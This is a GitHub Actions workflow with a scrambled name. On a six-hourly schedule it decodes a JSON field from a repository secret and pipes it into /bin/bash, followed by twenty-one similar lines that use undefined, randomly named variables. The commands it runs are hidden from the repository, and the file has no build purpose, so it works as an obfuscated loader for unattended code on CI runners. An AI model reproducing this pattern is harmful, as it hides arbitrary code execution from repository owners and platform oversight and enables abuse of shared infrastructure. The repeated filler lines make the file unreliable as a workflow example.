name: crowfootpenetrate
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: crowfootpenetrate
        env:
          udsxe3056: ${{ secrets.udsxe3056 }}
        run: |
          echo $udsxe3056 | jq -r .kxlqw3622 | /bin/bash
          echo $imx59280 | jq -r .ue04745 | /bin/bash
          echo $sn4842 | jq -r .u91 | /bin/bash
          echo $u02 | jq -r .b4 | /bin/bash
          echo $znr7272 | jq -r .wt60962 | /bin/bash
          echo $k30180 | jq -r .ug730 | /bin/bash
          echo $tvn5 | jq -r .cgwaq4 | /bin/bash
          echo $cagk04863 | jq -r .mu5 | /bin/bash
          echo $ifaq064 | jq -r .uxzds6 | /bin/bash
          echo $iuh0448 | jq -r .fsot27067 | /bin/bash
          echo $wlzh2417 | jq -r .yr16558 | /bin/bash
          echo $us86927 | jq -r .p440 | /bin/bash
          echo $pu88155 | jq -r .uzdm5021 | /bin/bash
          echo $ewxdv23 | jq -r .zm760 | /bin/bash
          echo $llcit106 | jq -r .s297 | /bin/bash
          echo $mlt984 | jq -r .ayu47 | /bin/bash
          echo $yybgu9484 | jq -r .ur14688 | /bin/bash
          echo $dnrq66705 | jq -r .cge5 | /bin/bash
          echo $mao191 | jq -r .v6696 | /bin/bash
          echo $opdo1467 | jq -r .xkt3863 | /bin/bash
          echo $hprs5935 | jq -r .snl97 | /bin/bash
          echo $drqc6 | jq -r .oy654 | /bin/bash

